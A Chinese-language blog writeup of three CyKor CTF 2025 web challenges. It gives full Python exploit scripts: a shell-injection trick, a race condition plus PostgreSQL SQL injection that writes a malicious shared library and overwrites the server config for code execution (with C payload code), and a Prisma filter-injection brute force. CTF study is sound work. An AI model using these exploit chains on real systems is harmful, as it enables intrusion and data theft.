Turker
Turker
Published on 2025-12-07 / 45 Visits
0

CyKor CTF 2025 & LakeCTF Quals 25-26 Writeup

CyKor CTF 2025 Writeup

周末笔者边打 HITCTF 边打 CyKor CTF,属于是燃尽了。HITCTF 的 Writeup 先咕咕了,还有题目待复现。

Web

asterisk | 已解出

  1. 输入验证的时候允许 ASCII 码 ≤ 57 的字符通过,其中包含了& (38)、* (42)、' (39)、# (35)
  2. 我们的 input 直接拼接到 shell 命令中,没有任何过滤
const shell = `echo ${input} | node ../bin/mini-run.js --b64code '${b64code}'`;
  1. 当我们输入 &* 时:
    1. echo & → echo 在后台执行
    2. * → 展开为 ./users/ 目录下所有文件名
    3. 第一个文件名作为命令执行,其余作为参数
  2. 所以我们可以创建用户 sht ,其中 t 的文件内容保存为 cat /flag

dbchat | 已解出

  1. register 路由中,用户文件 (save_user) 是先保存的,但角色 (ROLE 列表) 的插入是在一个模拟的耗时操作 (get_msg) 之后进行的。ROLE 列表的顺序依赖于用户文件名的字母排序 (get_username_rank)。
  2. 所以我们注册两个用户,slow 用户用时长,字典序小;fast 用户用时短,字典序在 slow 和 admin 之间。
    1. fast 完成时,计算出自己在文件列表中的排名 (Rank 1),并向 ROLE 列表索引 1 插入 'user'。此时 ROLE 为 ['admin', 'user']
    2. slow 完成时,计算出自己在文件列表中的排名 (Rank 0),并向 ROLE 列表索引 0 插入 'user'。此时 ROLE 为 ['user', 'admin', 'user']
    3. 此时 fast 用户对应的 ROLE[1] 变成了 admin,提权成功。
  3. 获取 Admin 权限后,/admin/chat 接口存在 SQL 注入漏洞。后端直接将用户输入拼接到 SQL 查询中:SELECT ... FROM people WHERE name='{name}';
  4. 对于 PostgreSQL ,我们利用他的 Large Object 功能进行任意写。
  5. 首先上传一个恶意库,定义构造函数使其加载时复制 flag 到用户名目录。
  6. 再利用 lo_createlowritelo_export 写入 .so文件
  7. 接着覆盖 postgresql.auto.conf ,设置 session_preload_libraries = '/app/users/exploit.so'
  8. pg_reload_conf() 重载配置,然后发起新的数据库连接请求。这会触发 PostgreSQL 加载我们的恶意库并执行其中的命令。
  9. 最后读取所有用户名获得 flag。

Exp:
exploit.py:

import urllib.request
import urllib.parse
import json
import threading
import time
import string
import random
import binascii

BASE_URL = "http://54.180.15.185:8081/play/1tHfAID8C7ZcFopX8v7XCWmUudOzfapF"

def make_request(endpoint, data=None, headers=None, method='GET', cookie_jar=None):
    url = f"{BASE_URL}{endpoint}"
    if headers is None:
        headers = {}
  
    if data is not None:
        json_data = json.dumps(data).encode('utf-8')
        headers['Content-Type'] = 'application/json'
    else:
        json_data = None

    if cookie_jar:
        cookies = "; ".join([f"{k}={v}" for k,v in cookie_jar.items()])
        headers['Cookie'] = cookies

    start = time.time()
    req = urllib.request.Request(url, data=json_data, headers=headers, method=method)
    try:
        with urllib.request.urlopen(req) as res:
            response_body = res.read().decode('utf-8')
      
            if res.getheader('Set-Cookie'):
                cookie_header = res.getheader('Set-Cookie')
                parts = cookie_header.split(';')
                if cookie_jar is not None:
                    for part in parts:
                        if '=' in part:
                            k, v = part.strip().split('=', 1)
                            if k == 'session':
                                cookie_jar['session'] = v
      
            duration = time.time() - start
            try:
                return duration, json.loads(response_body)
            except:
                return duration, response_body
    except urllib.error.HTTPError as e:
        duration = time.time() - start
        try:
            body = e.read().decode('utf-8')
            return duration, json.loads(body)
        except:
            return duration, body
    except Exception as e:
        return 0, str(e)

def register(username, password):
    duration, resp = make_request("/register", {
        "username": username,
        "password": password,
        "confirm_password": password,
        "role": "user"
    }, method='POST')

def login(username, password):
    cookie_jar = {}
    duration, resp = make_request("/login", {
        "username": username,
        "password": password
    }, method='POST', cookie_jar=cookie_jar)
  
    if isinstance(resp, dict) and resp.get('success'):
        return cookie_jar
    return None

def check_admin(cookie_jar):
    duration, resp = make_request("/admin", method='GET', cookie_jar=cookie_jar)
    if "welcome to admin page" in str(resp):
        return True
    return False

def exploit_race():
    for i in range(100):
        suffix = str(random.randint(10000, 99999))
        slow_user = "0" + suffix
        fast_user = "1" + suffix[:2]
  
        print(f"Attempting with Slow: {slow_user}, Fast: {fast_user}")
  
        t1 = threading.Thread(target=register, args=(slow_user, "pass"))
        t2 = threading.Thread(target=register, args=(fast_user, "pass"))
  
        t1.start()
        time.sleep(0.005) 
        t2.start()
  
        t1.join()
        t2.join()
  
        cookies = login(fast_user, "pass")
        if cookies:
            if check_admin(cookies):
                print(f"[+] Success! User {fast_user} is admin.")
                return cookies
    return None

def hex_encode(s):
    return binascii.hexlify(s.encode()).decode()

if __name__ == "__main__":
    cookies = exploit_race()
    if cookies:
        # 3-step Large Object upload
        # 1. Create LO with specific OID
        oid = random.randint(20000, 80000)
        print(f"Using OID: {oid}")
  
        payload = f"' UNION SELECT lo_create({oid})::text --"
        question = f"what is name of {payload}"
        print("Creating LO...")
        make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
  
        # 2. Write data to LO
        try:
            with open("exploit.so", "rb") as f:
                so_content = f.read()
            so_hex = so_content.hex()
        except Exception as e:
            print(f"Failed to read exploit.so: {e}")
            exit(1)
      
        # Let's try one big write first.
        payload = f"' UNION SELECT lowrite(lo_open({oid}, 131072), decode('{so_hex}', 'hex'))::text --"
        question = f"what is name of {payload}"
        print("Writing data to LO...")
        _, resp = make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
        print(resp)
  
        # 3. Export to file
        payload = f"' UNION SELECT lo_export({oid}, '/app/users/exploit.so')::text --"
        question = f"what is name of {payload}"
        print("Exporting to /app/users/exploit.so...")
        _, resp = make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
        print(resp)
  
        # Now same for postgresql.auto.conf
        oid2 = oid + 1
        print(f"Using OID2: {oid2}")
  
        payload = f"' UNION SELECT lo_create({oid2})::text --"
        question = f"what is name of {payload}"
        print("Creating LO 2...")
        make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
  
        config_content = "session_preload_libraries = '/app/users/exploit.so'\n"
        config_hex = hex_encode(config_content)
  
        payload = f"' UNION SELECT lowrite(lo_open({oid2}, 131072), decode('{config_hex}', 'hex'))::text --"
        question = f"what is name of {payload}"
        print("Writing config to LO 2...")
        make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
  
        config_path = "/var/lib/postgresql/17/main/postgresql.auto.conf"
        payload = f"' UNION SELECT lo_export({oid2}, '{config_path}')::text --"
        question = f"what is name of {payload}"
        print("Exporting config...")
        _, resp = make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
        print(resp)
  
        # Reload config
        payload = f"' UNION SELECT pg_reload_conf()::text --"
        question = f"what is name of {payload}"
        print("Reloading config...")
        _, resp = make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
        print(resp)
  
        # Trigger
        print("Triggering execution...")
        make_request("/admin/chat", {"question": "trigger"}, method='POST', cookie_jar=cookies)
  
        # Check users
        time.sleep(1)
        print("Checking users...")
        _, users_list = make_request("/admin/users", method='GET', cookie_jar=cookies)
        print(f"Users: {users_list}")
  
        if "CyKor" in str(users_list):
             print("FOUND FLAG!")
             parts = str(users_list).split(", ")
             for part in parts:
                 if "CyKor" in part:
                     print(f"Flag: {part}")

exploit.c:

#include <stdlib.h>
void __attribute__((constructor)) my_init() {
    system("cp /app/users/admin.json /app/users/$(/app/flag).json");
}

flag checker | 已解出

  1. User 模型包含 username(公开/可控)、answer(私密/目标)和 stage
  2. /leaderboard 接口接受 usernames 数组,并执行以下 Prisma 查询:
// src/index.ts
const where = !usernames || usernames.length === 0
  ? { stage: whereStage }
  : {
	  AND: [
		{
		  OR: usernames.map((username: string) => ({ username })), // 注入点
		},
		{ stage: whereStage },
	  ],
	};
const result = await prisma.user.findMany({ where, select: { id: true } });
  1. 直接拼接的 usernames 导致可以注入,我们可以构造 usernames: [{ "gt": { "_ref": "answer", "_container": "User" } }] 来让 Prisma 将其翻译为 SQL 中的 WHERE "username" > "answer",也即返回所有 username > answer 的 ID 列表。
  2. 此时我们完成了一个 Bool 类型的侧信道攻击,可以爆破 answer 了。

Exp:

import requests
import json
import sys
import time
import random
import string

BASE_URL = "http://3.37.112.26:3000"
USERNAME = "12312redsaf123"
PASSWORD = "password123"
CURRENT_PASSWORD = PASSWORD

ANSWER_REF = {"_ref":"answer","_container":"User"}

def register(username, password):
    res = requests.post(f"{BASE_URL}/register", json={"username": username, "password": password})
    return res.status_code == 200 or "Signup failed" in res.text

def login(username, password):
    session = requests.Session()
    res = session.post(f"{BASE_URL}/login", json={"username": username, "password": password})
    if res.status_code != 200 or "failed" in res.text:
        raise Exception("Login failed")
    return session

def update_username(session, new_username, password):
    payload = {
        "username": new_username,
        "password": password,
        "oldPassword": password
    }
    time.sleep(0.1)
    res = session.post(f"{BASE_URL}/update", json=payload)
  
    if "successful" not in res.text:
        return False
  
    time.sleep(0.2)
    return True

def get_my_id(session, username):
    payload = {
        "usernames": [{"equals": username}],
        "stage": {"gte": 0}
    }
    res = session.post(f"{BASE_URL}/leaderboard", json=payload).json()
    if "ids" in res and res["ids"]:
        return res["ids"][0]
    return None

def check_condition(session, stage, probe_username, my_id):
    payload = {
        "usernames": [{"gt": ANSWER_REF}],
        "stage": {"equals": stage} 
    }
  
    res = session.post(f"{BASE_URL}/leaderboard", json=payload)
    try:
        data = res.json()
        if "ids" in data:
            return my_id in data["ids"]
    except:
        pass
    return False

def solve_stage(session, stage_num, my_id):
    print(f"Solving Stage {stage_num}...")
  
    known = "KyCor{"
    charset = "0123456789abcdefg"
  
    # Characters smaller than '0' (ASCII 48)
    # '!' (33) to '/' (47)
    safe_low_chars = "!#$%&'()*+,-./"
  
    for i in range(16):
        low = 0
        high = 16
        ans_idx = 16
  
        while low <= high:
            mid = (low + high) // 2
            char_to_test = charset[mid]
    
            # Construct probe with random suffix to avoid collision
            suffix = "".join(random.choice(safe_low_chars) for _ in range(random.randint(1, 5)))
            probe = known + char_to_test + suffix
    
            if not update_username(session, probe, CURRENT_PASSWORD):
                print(f"  [!] Collision for {probe}. Retrying with new suffix...")
                suffix = "".join(random.choice(safe_low_chars) for _ in range(random.randint(6, 10)))
                probe = known + char_to_test + suffix
                if not update_username(session, probe, CURRENT_PASSWORD):
                     raise Exception(f"Persistent collision for {probe}")
    
            is_greater = check_condition(session, stage_num, probe, my_id)
    
            if is_greater:
                ans_idx = mid
                high = mid - 1
            else:
                low = mid + 1
  
        found_char = charset[ans_idx - 1]
        known += found_char
        print(f"  Found char {i+1}/16: {found_char} -> {known}")
  
    final_answer = known + "}"
    print(f"Stage {stage_num} Answer: {final_answer}")
  
    res = session.post(f"{BASE_URL}/answer", json={"answer": final_answer})
    print(f"Submit: {res.text}")
    time.sleep(0.5)
  
    if "Answer correct" in res.text:
        return True
    elif "CyKor{" in res.text:
        print(f"FLAG FOUND: {res.json()['message']}")
        return True
    else:
        print("Something went wrong.")
        return False

def main():
    register(USERNAME, PASSWORD)
    session = login(USERNAME, PASSWORD)
  
    my_id = get_my_id(session, USERNAME)
    print(f"My ID: {my_id}")
  
    if not my_id:
        print("Could not find my ID.")
        return

    current_stage = 0
    while current_stage <= 9:
        success = solve_stage(session, current_stage, my_id)
        if not success:
            break
        if current_stage == 9:
            break
        current_stage += 1

if __name__ == "__main__":
    main()